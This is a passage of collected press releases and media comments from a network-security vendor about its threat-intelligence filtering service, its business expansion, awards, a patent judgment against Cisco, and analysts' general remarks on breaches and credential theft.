intelligence data on the planet. The company is the only cybersecurity vendor delivering threat intelligence powered protection that neutralizes every known cyberattack at the network level while simultaneously driving down the cost of security operations. Centripetal goes beyond traditional threat intelligence methods and pushes the industry forward by operationalizing the world's largest collection of threat intelligence:CleanINTERNET® applies over 100 billion indicators of compromise from real-time intelligence feeds, updated every 15 minutes, to protect its customers' networks.Centripetal provides the fastest packet filtering technology on the planet, applying millions of threat intelligence based rules to incoming and outgoing datastreams with zero latency.Centripetal’s elite team of highly trained intelligence operations analysts acts as an extension of its customer’s internal cybersecurity team, who monitor and analyze emerging threats. This mitigates the skills gap and reduces the burden on overworked IT resources. “Centripetal has flipped the script by approaching the cyber problem from a completely different perspective. They offer superior protection through a network defense based on intelligence, not hope,” said Steve Wallstedt, veteran CISO and advisor. “Centripetal enables its global customers to take control of their security posture by operationalizing the world’s largest collection of threat intelligence and blocking all globally known attacks in real time. Now with CleanINTERNET® Cloud, customer assets will be protected across every environment.” CleanINTERNET® Cloud is available on Amazon Web Services today, and will be featured on Microsoft Azure and the Google Cloud Platform in late 2023.    GLOBAL EXPANSION In response to increasing global demand for its CleanINTERNET® offering, Centripetal has opened its European Cyber Intelligence Centre of Excellence to address cybersecurity threats in the UK and Ireland. Based in Galway, the European Cyber Intelligence Centre of Excellence will act as the central hub where new and existing customers can work with the company to gain insight on the current European and global threat landscape and how they might be affected. Customers will have access to Centripetal’s senior intelligence operations analysts, who continuously apply global threat intelligence to highlight critical risks and analyze emerging threats.   ABOUT CENTRIPETAL Centripetal, a global leader in intelligence powered cybersecurity, is operationalizing the world’s largest collection of threat intelligence, in real-time, to protect organizations from every known cyberthreat through its innovative patented technologies. Through its CleanINTERNET® service, Centripetal delivers a highly effective solution leveraging the latest computing technology and skilled intelligence operators at a significantly lower cost. We are experts in intelligence, with a team comprised of cryptologists, and  security operators from the U.S. Intelligence & Defense community who have protected the most sensitive assets in the world. Centripetal is based in Reston, VA with offices in Portsmouth, NH and Galway, Ireland. --- ### [Centripetal Expands Internationally With the Launch of its European Cyber Intelligence Centre of Excellence](https://www.centripetal.ai/company/press/centripetal-expands-internationally) Published: 2023-05-29 GALWAY, IRELAND (May 29, 2023) – Centripetal, the global leader in intelligence powered cybersecurity, today announced that it has opened its Galway based European Cyber Intelligence Centre of Excellence to address cybersecurity opportunities in the UK, Ireland and across Europe. Additionally, the company is enabling cloud-based deployments of its CleanINTERNET® solution for total enterprise protection. Centripetal is headquartered in the US and has plans to create 50 jobs in Galway. The project is supported by the Government of Ireland through IDA Ireland.  According to the International Trade Administration, The cybersecurity market in Ireland is thriving, valued at €280 million. However, with economic crime and fraud on the rise in recent years, cybercrime is extremely disruptive in how it impacts the business community. Grant Thornton Ireland reports that the cost of cybercrime in Ireland exceeded €9.6 billion in 2020. With the opening of Centripetal’s European Cyber Intelligence Centre of Excellence, the company will bring its innovative, patented technologies to the European market to protect organizations from every known cyberthreat. Centripetal’s European Cyber Intelligence Centre of Excellence will serve as the central hub where new and existing customers can work with Centripetal to gain insight on the current European and global threat landscape and how they might be affected. Customers will have access to Centripetal’s global cyber intelligence operations analyst team, who continuously analyze emerging threats, highlighting critical risks and applying global threat intelligence.  “Today’s jobs announcement is yet another vote of confidence in Galway, in our available skilled workforce and in our city and county as a great place to work and live. Galway was home to a number of significant investment announcements last year including Fidelity Investment, Genesys, SAP and Diligent, so Centripetal are certainly in good company,” said Minister Hildegarde Naughton TD. “Congratulations again to the entire team at Centripetal and thank you for choosing not only Galway but the people of Galway.” "The news that Centripetal is to open a European Cyber Intelligence Centre of Excellence in Galway is great news for the West Region and this investment will support the development of the wider technology ecosystem in Ireland for cyber,” said Anne-Marie Tierney Le-Roux, Head of Department Enterprise Technology at IDA Ireland. “The creation of 50 jobs is a vote of confidence in the talent and skill set that our regional locations in Ireland have to offer. I would like to wish Centripetal every success as they scale operations.’’ To give customers the ability to access intelligence powered cybersecurity everywhere, Centripetal’s CleanINTERNET® CLOUD is now available for deployment. The CleanINTERNET® service is a revolutionary approach to defending a company’s assets from cyber threats by leveraging dynamic threat intelligence on a mass scale. The solution can be deployed to protect assets running in cloud environments, providing unparalleled cyber defense and removing the need for more costly cybersecurity infrastructure. The addition of AWS cloud support extends CleanINTERNET® to protect all enterprise assets whether on premises, remote or in the cloud. Centripetal will additionally provide CleanINTERNET® on Azure and Google Cloud Platform in late 2023.  “Centripetal is the only cybersecurity vendor that delivers intelligence powered protection that neutralizes every known cyberattack at the network level while simultaneously driving down the cost of security operations,” said Jonathan Rogers, Chief Operating Officer for Centripetal. “Our innovative technology is an industry first and we’re thrilled to be partnering with the IDA to bring our solution to Ireland and the UK to not only provide unparalleled protection for our customers but also valuable employment opportunities for the country.” Centripetal uses threat intelligence to shield organizations from 99% of known cyberthreats globally with CleanINTERNET®. This uniquely managed cyber defense service provides greater effectiveness, lower costs, and enhanced security expertise to defend networks from attacks. Centripetal goes beyond traditional threat intelligence methods and pushes the industry forward by operationalizing the world's largest collection of threat intelligence:With over 250 Threat Intelligence providers, CleanINTERNET® applies over 100 billion indicators of compromise from real-time intelligence feeds, updated every 15 minutes, to protect its customers' networks.Centripetal defends customers' networks by providing the fastest packet filtering technology on the planet, applying millions of threat intelligence based rules to incoming and outgoing datastreams with zero latency.Centripetal’s elite team of highly trained intelligence operations analysts acts as an extension of its customer’s internal cybersecurity team, who monitor and analyze emerging threats. This mitigates the skills gap and reduces the burden on overworked IT resources.  ABOUT CENTRIPETAL Centripetal, a global leader in intelligence powered cybersecurity, is operationalizing the world’s largest collection of threat intelligence, in real-time, to protect organizations from every known cyberthreat through its innovative patented technologies. Through its CleanINTERNET® service, Centripetal delivers a highly effective solution leveraging the latest computing technology and skilled intelligence operators at a significantly lower cost. We are experts in intelligence, with a team comprised of cryptologists, and security analysts from the U.S. Intelligence & Defense community who have protected the most sensitive assets in the world. Centripetal is based in Reston, VA with offices in Portsmouth, NH and Galway, Ireland.  --- ### [CleanINTERNET® Controls for TikTok Available Following US Lawmakers Ban](https://www.centripetal.ai/company/press/cleaninternet-controls-available-for-tiktok) Published: 2022-12-29 Summary: Centripetal is now offering a feed through our CleanINTERNET® service that will immediately allow security policy managers to limit access to the TikTok platform In the last week, The U.S. House of Representatives ordered its staff and lawmakers to delete TikTok from any government-issued mobile device due to security concerns with the popular video-sharing app. But, it’s not just the government taking action for a potential security vulnerability. A handful of college campuses announced that they are banning access to TikTok from campus WiFi in accordance with their respective governors’ executive orders.  In light of these announcements, we are now offering a feed through our CleanINTERNET® service that will immediately allow security policy managers to limit access to the TikTok platform. This will be relevant for any of our customers who have concerns in relation to compliance with U.S. government regulations around employee access to the TikTok platform. Centripetal customers benefit from a decade of experience, working with global cyber threat intelligence partners, to provide an operationalized cyber threat intelligence solution, which proactively shields their network from most known threats.  For more information on CleanINTERNET® or if you have immediate US regulatory TikTok compliance concerns, contact us here. --- ### [Centripetal Announces Cybersecurity Partnership with Dynics](https://www.centripetal.ai/company/press/centripetal-networks-announces-cybersecurity-partnership-with-dynics) Published: 2022-05-18 Summary: Centripetal Networks, Inc. announced a new partnership with Dynics, Inc. providing clients with integrated industrial cybersecurity protection. RESTON, Va. and ANN ARBOR, Mich., May 18, 2022 -- Centripetal today announced a new partnership with Dynics, Inc. providing clients with integrated industrial cybersecurity protection that extends from the internet to the factory floor. "Our integration with Dynics combines their ICS Defender solution with our CleanINTERNET intelligence-driven, network defense service," said Jonathan Rogers, COO at Centripetal. "Cyberattacks are prolific and industrial manufacturing and critical infrastructure networks are all very vulnerable. These networks face an expanded attack surface that includes an overwhelming array of technologies from different manufacturers, using different protocols and operating systems. These systems perform hundreds of automated functions across the industrial environment. Visibility and action are critical to protecting these networks. With Dynics and Centripetal, our integrated solution provides the visibility and immediate action needed to protect the entire industrial landscape." Globally, ransomware attacks more than doubled from 2020 to 2021, and the worldwide impact of the cybercrime economy exceeded $6 trillion last year alone. According to Jeff Smith, CTO at Dynics, "As industrial machines have become increasingly connected to cyberspace in the 'internet of things,' they, too, have become highly vulnerable to cyberattack. This has forced organizations to become proactive about protecting themselves, rather than reactive. Security by obscurity is no longer a thing. A robust approach to cybersecurity requires best-in-class solutions, and we're excited to be able to offer that approach thanks to our new partnership with Centripetal." Through the cybersecurity partnership, Centripetal and Dynics will offer customers the ability to monitor and prevent threats to industrial manufacturing and critical infrastructure organizations across their entire networks. From the network layer through to the industrial control systems layer and the devices those systems run. Centripetal's CleanINTERNET service integrates and operationalizes real-time global threat intelligence, using it to make instant decisions and take action on known threats before they hit the customer network, and to stop outbound malware and data exfiltration before it hits the internet. Dynics' ICS Defender is an industrial control system security platform that meets today's needs of OT and IT professionals as a comprehensive solution that is powerful enough to support a purely OT, or an OT/IT convergent environment. The two products together provide end-to-end visibility and control. For more information or to schedule interviews with representatives from Centripetal or Dynics, please contact Samantha Louque at 202-471-4228 x114 or 336657@email4pr.comAbout CentripetalCentripetal is a three-time Deloitte Fast 500 company, whose cyber security systems are deployed in many of the world's most mission critical networks. Its goal is to make the most advanced intelligence-based defense available to everyone as a service. Through research, Centripetal is resolving technological challenges to put trust back into internet connection.About Dynics Inc.Established in 1997, Dynics creates high-quality industrial hardware, designing, building, and servicing its systems from its headquarters in Ann Arbor, Michigan. Dynics offers top hardware and software-based solutions for factory automation, enabling its customers to gain a competitive edge. --- ### [Centripetal Features in Deloitte’s 2020 Technology Fast 500™](https://www.centripetal.ai/company/press/deloittes-2020-technology-fast-500) Published: 2020-12-01 Summary: Portsmouth, New Hampshire – November 30, 2020 — Centripetal today announced it ranked 124th on Deloitte’s Technology Fast 500™, a ranking of the 500 fastest growing technology, media,… Centripetal Attributes 957 Percent Revenue Growth to the Demand for Intelligence Driven Network DefensePortsmouth, New Hampshire – November 30, 2020 — Centripetal today announced it ranked 124th on Deloitte’s Technology Fast 500™, a ranking of the 500 fastest growing technology, media, telecommunications, life sciences, and energy tech companies in North America now in its 26th year. Centripetal grew 957 percent during this period. Centripetal’s chief executive officer, Steven Rogers, credits the company’s highly advanced CleanINTERNET® solution for their revenue growth. “We are pleased, for the second year in a row, to be part of the Fastest-Growing Companies in North America on Deloitte’s Technology Fast 500 list,” said Steven Rogers, CEO of Centripetal. “Our success is due to our dedicated team. They continue to develop and deliver our customer-focused solution – CleanINTERNET.  As cyber threats become more complex all organizations can take the upper hand and rely on our team for proactive use intelligence driven services. That value has resulted in exceptional growth for Centripetal.” Centripetal with its CleanINTERNET offering is revolutionary in its ability to leverage mass-scale intelligence to protect an organization’s network operations. Centripetal’s team is composed data scientists, engineers, mathematicians, and seasoned cybersecurity professionals from the private sector and the U.S. intelligence & Defense communities. Centripetal’s team has secured and protected many of the most sensitive communications assets in the world. Centripetal takes pride in providing intelligence solutions as a client-specific service to safeguard the organization as a whole, it’s employees, and partners. “For more than 25 years, we’ve been honoring companies that define the cutting edge and this year’s Technology Fast 500 list is proof positive that technology — from software and digital media platforms, to biotech — truly does permeate so many facets of our lives,” said Paul Silverglate, vice chairman, Deloitte LLP and U.S. technology sector leader. “We congratulate this year’s winners, especially during a time when innovation is needed more than ever to address the monumental challenges posed by the pandemic.” “Each year the Technology Fast 500 listing validates how important technology innovation is to our daily lives. It was interesting to see this year that while software companies continued to dominate, biotech companies rose to the top of the winners list for the first time, demonstrating that new categories of innovation are accelerating in the pursuit of making life easier, safer and more productive,” said Mohana Dissanayake, partner, Deloitte & Touche LLP, and industry leader for technology, media and telecommunications, within Deloitte’s audit and assurance practice. “We extend sincere congratulations to these well-deserved winners — who all embody a spirit of curiosity, and a never-ending commitment to making technology advancements possible.” Centripetal previously ranked 93 as a Technology Fast 500™ award winner for 2019. Overall, 2020 Technology Fast 500™ companies achieved revenue growth ranging from 175% to 106,508% from 2016 to 2019, with median growth of 450 percent.About Deloitte’s 2020 Technology Fast 500™Now in its 26th year, Deloitte’s Technology Fast 500 provides a ranking of the fastest growing technology, media, telecommunications, life sciences and energy tech companies — both public and private — in North America. Technology Fast 500 award winners are selected based on percentage fiscal year revenue growth from 2016 to 2019.About CentripetalCentripetal delivers intelligence-driven security. Centripetal invented the Threat Intelligence Gateway and leverages its technologies to deliver CleanINTERNET, a comprehensive intelligence-led cyber service. With Centripetal, customers across every vertical and of every size can persistently prevent over 90% of known threats with intelligence applied in advance. Gartner, Inc. previously named Centripetal a "Cool Vendor" in security for 2017, the Security Innovation Network (SINET) named Centripetal a “SINET-16” awardee, and was ranked number 124 of the Fastest Growing Companies in North America on Deloitte’s 2020 Technology Fast 500™.  In 2019 Centripetal was ranked #93 on the Deloitte Fast 500. Centripetal’s technology is protected by over 50 US and international patents and is deployed protecting critical networks globally. About DeloitteDeloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee (“DTTL”), its network of member firms, and their related entities. DTTL and each of its member firms are legally separate and independent entities. DTTL (also referred to as “Deloitte Global”) does not provide services to clients. In the United States, Deloitte refers to one or more of the US member firms of DTTL, their related entities that operate using the “Deloitte” name in the United States and their respective affiliates. Certain services may not be available to attest clients under the rules and regulations of public accounting. Please see www.deloitte.com/about to learn more about our global network of member firms.   --- ### [Centripetal Networks x Cisco: Willful Patent Infringement](https://www.centripetal.ai/company/press/centripetal-ciscos-willful-patent-infringement) Published: 2020-10-06 Summary: District Judge Henry Morgan issued Judgment in favor of Centripetal after a 22-day bench trial in Centripetal Networks, Inc. v. Cisco Systems, Inc. Centripetal Networks Awarded $2.6 to $3.2 billion in Patent Damages for Cisco’s Willful Patent Infringement Herndon, Virginia – October 6, 2020 — Yesterday, United States District Judge for the Eastern District of Virginia, the Honorable Henry Coke Morgan, Jr. issued Judgment in favor of Centripetal Networks after the conclusion of a 22-day bench trial in Centripetal Networks, Inc. v. Cisco Systems, Inc., Case No. 2:18-cv-94. At trial, Centripetal Networks asserted that Cisco Systems (“Cisco”) infringed five U.S. patents: U.S. Patent Nos. 9,137,205 (“the ‘205 Patent”), 9,203,806 (“the ‘806 Patent”), 9,560,176 (“the ‘176 Patent”), 9,686,193 (“the ‘193 Patent”), 9,917,856 (“the ‘856 Patent”). Centripetal’s technology is designed to apply massively scaled intelligence to proactively defend internet connected networks. Centripetal innovated for the past decade and invested extensively to develop each component of its suite of security technologies. The company developed an intelligence driven security gateway branded RuleGATE® which enables a powerful cost-effective service called CleanINTERNET®. This layer of protection makes it extremely difficult for an attacker to penetrate and exploit legitimate networks. Yesterday afternoon, the Court issued a 178-page Opinion and Order, detailing its findings that Cisco willfully infringed four of the five asserted patents, awarded patent damages of $755,808,545 (enhanced 2.5 times for willful infringement), prejudgment interest of $13,717,925, which resulted in a total past damages award in an amount of $1,903,239,288. The Court also awarded a running royalty of 10% on the apportioned sales of the accused products and their successors for a period of three years, followed by a second three-year term with a running royalty of 5% on such sales, resulting in a total patent damages award of $2,657,941,011 to $3,253,585,041. The damages award is the largest award of any U.S. patent case to date. “The Court’s ruling affirms the opportunity for innovative companies like ours to develop solutions for the largest market opportunities,” said Steven Rogers, CEO of Centripetal Networks. “We’ve worked toward a paradigm shift in security through our development of the fundamental technologies behind CleanINTERNET. We believe these technologies are important for the country. Without the protection of a patent an emerging company could never take on big important challenges like these. We are grateful to the court for affirming this.” “So many in our company have worked in communications security and intelligence their entire careers,” said Jonathan Rogers, COO of Centripetal Networks. “We offer the best and most advanced intelligence solutions on the market. From this point forward we will continue to add researchers, engineers, and security analysts to the Centripetal team. We want to ensure the problem of cyber-security is marginalized and we’re going to make the investments necessary to do that.” About Centripetal Centripetal delivers intelligence-driven security. Centripetal invented the Threat Intelligence Gateway and leverages its technologies to deliver CleanINTERNET, a comprehensive intelligence-led cyber service. With Centripetal, customers across every vertical and of every size can persistently prevent over 90% of known threats with intelligence applied in advance. Gartner, Inc. previously named Centripetal a "Cool Vendor" in security for 2017, the Security Innovation Network (SINET) named Centripetal a “SINET-16” awardee, and was ranked number 93 of the Fastest Growing Companies in North America on Deloitte’s 2019 Technology Fast 500™. Centripetal’s technology is protected by over 50 US and international patents and is deployed protecting critical networks globally. For more information, visit centripetalstg.wpenginepowered.com. Copyright © 2020 Centripetal Networks Inc. All rights reserved. CleanINTERNET, RuleGATE, QuickThreat, AI-Analyst, ACT, and the Centripetal design are registered trademarks of Centripetal Networks Inc. Centripetal’s products and technologies are covered by multiple U.S. and international patents. For a full list and for more information, please visit centripetalstg.wpenginepowered.com/legal. All other names and trademarks are property of their respective owners. --- ### [Centripetal Ranks in Deliottes Technology Fast 500™](https://www.centripetal.ai/company/press/deliottes-technology-fast-500-2019) Published: 2019-12-02 Summary: Centripetal Ranked Number 93 of the Fastest Growing Companies in North America on Deloitte’s 2019 Technology Fast 500™ Centripetal Ranked Number 93 of the Fastest Growing Companies in North America on Deloitte’s 2019 Technology Fast 500™ Centripetal Attributes 1800% Revenue Growth to the Demand for Intelligence Driven Network Defense Herndon, Virginia – December 2, 2019 — Centripetal today announced it ranked 93 on Deloitte’s Technology Fast 500™, a ranking of the 500 fastest growing technology, media, telecommunications, life sciences, and energy tech companies in North America now in its 25 th year. Centripetal grew 1800% during this period. Centripetal’s chief executive officer, Steven Rogers, credits the company’s highly advanced CleanINTERNET® system technologies for their 1800% revenue growth. “With our patented technologies we are able to use intelligence to drive everything we do,” said Steven Rogers, CEO of Centripetal. “CleanINTERNET inspects everything crossing the network, we figure out what matters for our customers and then act to guard their network. With intelligence it is not enough just to analyze; organizations desperately want to actively defend against malicious threats.” Centripetal with its CleanINTERNET offering is revolutionary in its ability to leverage mass-scale intelligence to protect an organization’s network operations. In addition to its advanced system technologies Centripetal’s team is composed of seasoned cybersecurity professionals from the private sector and the U.S. intelligence Defense communities that have secured and protected the most sensitive communications assets in the world. Centripetal takes pride in providing intelligence solutions as a client-specific service to safeguard the organization as a whole, it’s employees, and partners. “This year marks the 25th anniversary of Deloitte’s Technology Fast 500, so we are especially pleased to announce and congratulate the 2019 winners,” said Sandra Shirai, vice chairman, Deloitte LLP, and U.S. technology, media, and telecommunications leader. “Once again, we saw innovation across the board, with software companies continuing their dominance of the top ten. It’s always inspiring to see how the Fast 500 companies are transforming business and the world we live and work in.” “As technology innovation trends towards ‘everything as a service,’ it’s no surprise that software companies dominate the winners list yet again this year,” said Mohana Dissanayake, partner, Deloitte Touche LLP, and industry leader for technology, media and telecommunications, within Deloitte’s audit and assurance practice. “What’s exciting about celebrating 25 years of the Tech Fast 500 is we now have a quarter century of innovation stories to draw and reflect upon. These are the companies that push boundaries, help organizations become more efficient and productive, and ultimately enable businesses to drive growth and revenue. We congratulate all the well-deserving winners.” Overall, 2019 Technology Fast 500™ companies achieved revenue growth ranging from 166 percent to 37,458 percent from 2015 to 2018, with median growth of 439 percent. Now in its 25th year, Deloitte’s Technology Fast 500 provides a ranking of the fastest growing technology, media, telecommunications, life sciences and energy tech companies — both public and private — in North America. Technology Fast 500 award winners are selected based on percentage fiscal year revenue growth from 2015 to 2018. About Centripetal Centripetal delivers intelligence-driven security. Centripetal invented the Threat Intelligence Gateway and leverages its technologies to deliver CleanINTERNET, a comprehensive intelligence-led cyber service. With Centripetal, customers across every vertical and of every size can persistently prevent over 90% of known threats with intelligence applied in advance. Gartner, Inc. previously named Centripetal a "Cool Vendor" in security for 2017, and the Security Innovation Network (SINET) named Centripetal a “SINET-16” awardee. Centripetal’s technology is protected by over 50 US and international patents and is deployed protecting critical networks globally. About Deloitte Deloitte refers to one or more of Deloitte Touche Tohmatsu Limited, a UK private company limited by guarantee (“DTTL”), its network of member firms, and their related entities. DTTL and each of its member firms are legally separate and independent entities. DTTL (also referred to as “Deloitte Global”) does not provide services to clients. In the United States, Deloitte refers to one or more of the US member firms of DTTL, their related entities that operate using the “Deloitte” name in the United States and their respective affiliates. Certain services may not be available to attest clients under the rules and regulations of public accounting. Please see www.deloitte.com/about to learn more about our global network of member firms. --- ### [Centripetal CleanINTERNET in The Last Watchdog](https://www.centripetal.ai/company/press/centripetal-cleaninternet-last-watchdog) Published: 2019-09-24 Summary: Byron Acohido of  The Last Watchdog features Centripetal CleanINTERNET in his article 'SHARED INTEL: Here’s One Way to Better Leverage Actionable Intel From the Profusion of Threat Feeds.' Byron Acohido of  The Last Watchdog features Centripetal CleanINTERNET in his article 'SHARED INTEL: Here’s One Way to Better Leverage Actionable Intel From the Profusion of Threat Feeds.' From the article: "Centripetal’s CleanINTERNET service is built around correlating and analyzing threat feeds pulled in from some 90 commercial, government and open-source entities. The heavy lifting Centripetal does on behalf of its customers involves correlating billions of threat indicators to derive a set of robust correlation rules that, in turn, become the basis for which traffic is allowed to enter – or leave — a customer’s network." --- ### [Centripetal Discusses Shielding in Infosecurity Magazine](https://www.centripetal.ai/company/press/centripetal-discusses-shielding) Published: 2019-09-14 Summary: Centripetal Discusses Shielding and Credentials Practice to Prevent Network Infiltration and Data Exfiltration in Infosecurity Magazine's Article "Boost Mobile Alerts Customers of Security Incident." Centripetal Discusses Shielding and Credentials Practice to Prevent Network Infiltration and Data Exfiltration in Infosecurity Magazine's Article "Boost Mobile Alerts Customers of Security Incident." Attackers using compromised credentials accounted for 29% of data breaches, according to Verizon’s 2019 Data Breach Investigation Report. The unauthorized access at Boost Mobile is what Byron Rashed, VP of marketing, Centripetal, called a classic example of a series of events that enables threat actors to infiltrate networks and exfiltrate customer data and/or personally identifiable information." More below: Byron Rashed, VP of Marketing at Centripetal Networks: “Usually, a compromised credential from a third-party breach starts the process. The threat actor can use various unsophisticated/sophisticated techniques to either obtain a password or crack a hashed password. Once an account is compromised, the threat actor can find a way into the network and access various databases,” Rashed said. “The credentials can be a typical customer/user and/or an admin that has network access. Threat actors can leverage various tools and social media to find out information on users/admins and obtain a password (such as the names of spouses, children, pets, etc.) and try different combinations using automated tools.” In addition to urging customers to follow the security strategies set forth by the Federal Trade Commission, Boost Mobile sent temporary PIN code via text message, reminding customers to avoid combinations such as "1234" or "0000." “The best defense against attackers using stolen credentials is to use a password that is unique with various characters and one that does not contain anything that is specific to the individual as noted,” Rashed added. “On the network defense side, shielding against known IPs, domains, and other sources is critical. Most breaches come from known sources. To shield these sources from the onset greatly increases the organization’s security posture.” --- ### [Intellyx Discusses Centripetal Networks](https://www.centripetal.ai/company/press/intellyx-discusses-centripetal-networks) Published: 2019-08-13 Summary: Centripetal correlates billions of threat indicators in order to generate millions of complex rules that in turn drive automatic enforcement in the gateway without sacrificing performance Threat Intelligence Gateway that Leverages Thousands of Intelligence Feeds. From the article: "Most firewalls automatically configure themselves by listening to a mere handful of such feeds, thus leveraging less than one percent of available threat data. In contrast, Centripetal Networks leverages thousands of threat data feeds representing millions of ever-changing individual data points. Centripetal’s gateway extrapolates from these feeds in real-time and applies advanced packet filtering at the network edge to prevent unwanted traffic from ever hitting a network. Centripetal correlates billions of threat indicators in order to generate millions of complex rules that in turn drive automatic enforcement in the gateway without sacrificing performance, as well as providing security analysts with consumable threat data." To read more, please see the article on Intellyx. --- ### [Centripetal comments in TechNewsWorld Story](https://www.centripetal.ai/company/press/centripetal-comments-technewsworld-story) Published: 2019-06-27 Summary: Centripetal Threat Analyst Jonathan Oliveira Comments in TechNewsWorld Story "Chinese Hackers Linked to Global Attacks on Telcos." Centripetal Threat Analyst Jonathan Oliveira Comments in TechNewsWorld Story "Chinese Hackers Linked to Global Attacks on Telcos." Security researchers on Monday reported that Chinese hackers are the likely perpetrators of a series of cyberattacks against telecommunications companies around the world. The attackers attempted to steal all data stored in the active directory servers of the organizations, including all usernames and passwords in the companies, as well as other personally identifiable information, billing data, call detail records, credentials, email servers, geo-location of users, and more, according to the report. Jonathan Oliveira, Threat Analyst at Centripetal Networks: "This type of attack would greatly help Huawei in their fight to control as much of the 5G space as possible," said Jonathan Olivera, a threat analyst for Centripetal Networks, a network security company in Herdon, Virginia. "When a country like China relies on surveillance and intellectual property theft to keep its momentum going, it will be hard to stop and prevent expansion," he told TechNewsWorld. --- ### [Centripetal Discusses Account Hijacking](https://www.centripetal.ai/company/press/technewsworld-account-hijacking) Published: 2019-06-21 Summary: Account hijacking has been going on for more than a decade, said Byron Rashed, vice president of marketing at Centripetal Networks, a network security company in Herndon, Virginia. Centripetal Featured in TechNewsWorld Article "Instagram Targets Account Hijacking." Account hijacking has become a nettlesome problem at Instagram so it has decided to do something about it. The social media company on Monday said it has begun testing a simpler method for users to reclaim their compromised accounts. The move, first reported by Motherboard, allows users locked out of their hacked accounts to ask for a six-digit code to be sent to the email address or phone number originally used to open the account. Byron Rashed, VP of Marketing at Centripetal Networks: Account hijacking has been going on for more than a decade, said Byron Rashed, vice president of marketing at Centripetal Networks, a network security company in Herndon, Virginia. "At first, it was a challenge by script kiddies, but then it became a business when threat actors discovered how valuable these accounts can be," he told TechNewsWorld. "Many accounts can have valuable personal identifying information that can be sold and traded in the underground economy to fully monetize the exfiltrated accounts." To read more, please see the article.   --- ### [Centripetal Featured in Brilliance Security Magazine](https://www.centripetal.ai/company/press/centripetal-brilliance-security-magazine) Published: 2019-06-03 Summary: Centripetal's Senior Threat Analyst Colin Little Featured in Brilliance Security Magazine Story "Instagram Influencers Account and Contact... Centripetal's Senior Threat Analyst Colin Little Featured in Brilliance Security Magazine Story "Instagram Influencers Account and Contact Information Exposed – What the Experts are Saying" A massive database containing the contact information of millions of Instagram influencers, celebrities, and brand accounts has been exposed online. The database, hosted by Amazon Web Services, was left without a password allowing anyone to look inside.  It is thought that the database has over 49 million records. Colin Little, Senior Threat Analyst Centripetal Networks: “This event confirms just how much like a toothpaste our own data is: once it’s out of the tube, it’s out and is never going back in. Phone numbers, email addresses, and other PII can be legally bought and sold and the only opportunity we have to consent to this act is to read the fine print or abstain from using the service; it can also be illegally acquired by criminals because the database within which they reside is improperly secured. In almost any other venue in the world, when I use the service of a business such as a mechanic, that mechanic is solely responsible for the quality and security of the product. I don’t have to see if VIP has checked a national muffler repair chain’s labor standard, and then find out that the chain contracts labor out to countless third parties. This is the risk of using online services, or even registering for an account: that this PII will be sold to third parties without my knowledge and without truly informed consent.” To read more, please see the article. --- ### [Centripetal Comments on the First American Data Breach](https://www.centripetal.ai/company/press/first-american-data-breach) Published: 2019-06-03 Centripetal Comments on the First American Data Breach That Exposed 885 Million Sensitive Records Brian Krebs broke the news late Friday that Fortune 500 real estate insurance giant First American exposed approximately 885 million sensitive records because of a bug in its website. The news has been picked up by various business media. Byron Rashed, VP of Marketing at Centripetal Networks: “This kind of disclosure isn’t common; usually the back doors are from vulnerabilities that have not yet been discovered or patched.  In this case, there was no authentication – if you stole credentials from somewhere else, you could access all kinds of account information. It’s very surprising for a Fortune 500 company to have this kind of security posture.  What they should have done is what most companies do -authenticate with a password or 2 factor authentication.  This so beyond a textbook example of a breach.”  To read more, please see the article. --- ### [Centripetal Featured in PaymentsSource PayThink Blog](https://www.centripetal.ai/company/press/centripetal-paymentssource) Published: 2019-05-15 Summary: Centripetal CEO Steven Rogers Featured in PaymentsSource PayThink Blog "The Intel to Thwart New Cyberattacks Already Exists." Centripetal CEO Steven Rogers Featured in PaymentsSource PayThink Blog "The Intel to Thwart New Cyberattacks Already Exists." Steven Rogers, President and CEO of Centripetal Networks: Excerpt from the article: "Cybersecurity teams no longer need to wait for a vulnerability to be exposed before doing anything. By proactively shielding from known threats, the practical effect of a vulnerability is already mitigated. Best practice is to always find and fix vulnerabilities, but if shielding from high-risk indicators is in place, most attacks would be stopped anyway. Shielding the known threats can protect the enterprise from yet unknown vulnerabilities, long before they are discovered by other means." To read more, please see the article in PaymentsSource. --- ### [Centripetal Provides Insight in Chief Privacy Officer Magazine](https://www.centripetal.ai/company/press/centripetal-chief-privacy-officer-magazine) Published: 2019-05-11 Summary: Centripetal Provides Insight in Today's Chief Privacy Officer Magazine. Colin Little, Senior Threat Analyst at Centripetal Networks: Centripetal Provides Insight in Today's Chief Privacy Officer Magazine (CPO) Story, "New Cyber Security Directive Forces Federal Agencies to Patch Vulnerabilities Twice as Fast“ United States federal government agencies are now required to patch the most serious vulnerabilities in half the time. A new cyber security directive from the Department of Homeland Security (DHS) has cut the mandatory time to patch vulnerabilities rated “critical” down from 30 to 15 calendar days, in a bid to shore up cyber security in the face of increasing activity by threat actors and some high-profile failures. Experts Commented below: Colin Little, Senior Threat Analyst at Centripetal Networks: The federal government’s new cyber security directive really does not serve as a good measuring stick for how independent businesses should patch vulnerabilities. As Colin Little, Senior Threat Analyst for Centripetal, points out: “We have seen time and again where a new critical vulnerability is publicized and, within hours of that release, scans for the associated service start flooding the internet. Network owners must realize that when a new critical vulnerability is released that affects them, they are one degree of separation away from an emergency. These same network owners desperately need a mechanism which is adopted by system owners and incorporated into change management procedures, in order to respond with urgency where they are able. Such a process would treat the vuln as though it were an emergency, complete with backup procedures and other risk-mitigation strategies associated with patching a system. They must do this if they are to avoid the actual emergency of systems compromise. “Network owners would also do well to know that malicious actors have likely already performed reconnaissance on their public-facing services so that, when a new critical vulnerability is discovered, they already have a list of targets where they have identified that service or technology is present. Having a vulnerability scan of your public-facing services is fundamental, but in addition to this network owners would benefit from a service which notifies and blocks against active attacks on their public-facing infrastructure.” It’s a hard fact that many businesses will find themselves in a similar boat as some of these federal agencies, however. They may have legacy systems that they cannot replace, or a fragile patchwork in place that continual security patches threaten to unexpectedly upend in some way. And total upgrade or replacement of existing systems is simply not in the cards, perhaps for budget reasons or due to unique industry needs. As Little points out, another hard fact is that 15 working days is simply not an adequate response time to patch critical vulnerabilities in many cases. This is particularly true in the case of emerging (“zero day”) threats. At minimum, an adequate emergency backup and restoration system is an absolute necessity. --- ### [Centripetal Comments in Data Center Knowledge article](https://www.centripetal.ai/company/press/centripetal-data-center-knowledge) Published: 2019-05-03 Summary: Centripetal's Senior Threat Analyst Colin Little  Comments in Data Center Knowledge article "How Data Centers Can Use the New Smart Cybersecurity Tools" Centripetal's Senior Threat Analyst Colin Little  Comments in Data Center Knowledge article "How Data Centers Can Use 